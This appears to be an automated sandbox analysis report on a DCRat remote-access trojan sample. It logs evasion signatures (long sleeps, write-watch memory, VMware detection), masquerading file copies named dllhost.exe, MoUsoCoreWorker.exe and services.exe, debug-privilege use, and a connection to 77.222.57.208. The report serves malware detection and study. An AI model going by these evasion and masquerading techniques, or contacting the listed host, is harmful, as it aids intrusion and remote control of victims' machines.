Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\3D Objects\services.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Memory allocated: A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Memory allocated: 1A910000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Memory allocated: AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Memory allocated: 1A540000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Memory allocated: E60000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Memory allocated: 1050000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Memory allocated: 1AD30000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Memory allocated: 11B0000 memory reserve | memory write watch
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Users\user\3D Objects\services.exe Memory allocated: 18C0000 memory reserve | memory write watch
Source: C:\Users\user\3D Objects\services.exe Memory allocated: 18C0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599187 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\3D Objects\services.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Window / User API: threadDelayed 725 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Window / User API: threadDelayed 1158 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Window / User API: threadDelayed 1543 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Window / User API: threadDelayed 366
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Window / User API: threadDelayed 366
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Window / User API: threadDelayed 355
Source: C:\Users\user\3D Objects\services.exe Window / User API: threadDelayed 367
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ppXCre3i9k.exe TID: 6608 Thread sleep count: 725 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe TID: 6576 Thread sleep count: 1158 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe TID: 6436 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7256 Thread sleep count: 238 > 30 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7228 Thread sleep count: 1543 > 30 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599641s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599516s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599406s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599297s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599187s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7740 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7724 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7380 Thread sleep count: 366 > 30
Source: C:\ProgramData\USOShared\Logs\dllhost.exe TID: 7204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe TID: 7316 Thread sleep count: 366 > 30
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe TID: 7672 Thread sleep count: 355 > 30
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe TID: 7612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\3D Objects\services.exe TID: 7680 Thread sleep count: 367 > 30
Source: C:\Users\user\3D Objects\services.exe TID: 7496 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\3D Objects\services.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599187 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\3D Objects\services.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: ppXCre3i9k.exe, 00000000.00000002.1671991946.000000001B98D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: ppXCre3i9k.exe, 00000000.00000002.1673153564.000000001BBBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\siOG5HgMsNg5o
Source: ppXCre3i9k.exe, 00000000.00000002.1672923539.000000001BB54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: dllhost.exe, 00000023.00000002.1711343493.000000001B690000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000025.00000002.1718064296.000002339A0E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process token adjusted: Debug
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process token adjusted: Debug
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process token adjusted: Debug
Source: C:\Users\user\3D Objects\services.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Network Connect: 77.222.57.208 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5v7z9xH3I0.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Queries volume information: C:\Users\user\Desktop\ppXCre3i9k.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Queries volume information: C:\ProgramData\USOShared\Logs\dllhost.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Queries volume information: C:\ProgramData\USOShared\Logs\dllhost.exe VolumeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe VolumeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe VolumeInformation
Source: C:\Users\user\3D Objects\services.exe Queries volume information: C:\Users\user\3D Objects\services.exe VolumeInformation
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000026.00000002.1757647895.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1669372033.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.0000000003498000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1709726280.0000000002541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1764319680.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1757647895.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1669372033.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1757826470.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1757826470.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ppXCre3i9k.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 5448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MoUsoCoreWorker.exe PID: 7192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MoUsoCoreWorker.exe PID: 7244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: services.exe PID: 7268, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000026.00000002.1757647895.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1669372033.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.0000000003498000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1709726280.0000000002541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1764319680.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1757647895.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1669372033.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1760602361.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1757826470.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1757826470.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ppXCre3i9k.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 5448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MoUsoCoreWorker.exe PID: 7192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MoUsoCoreWorker.exe PID: 7244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: services.exe PID: 7268, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
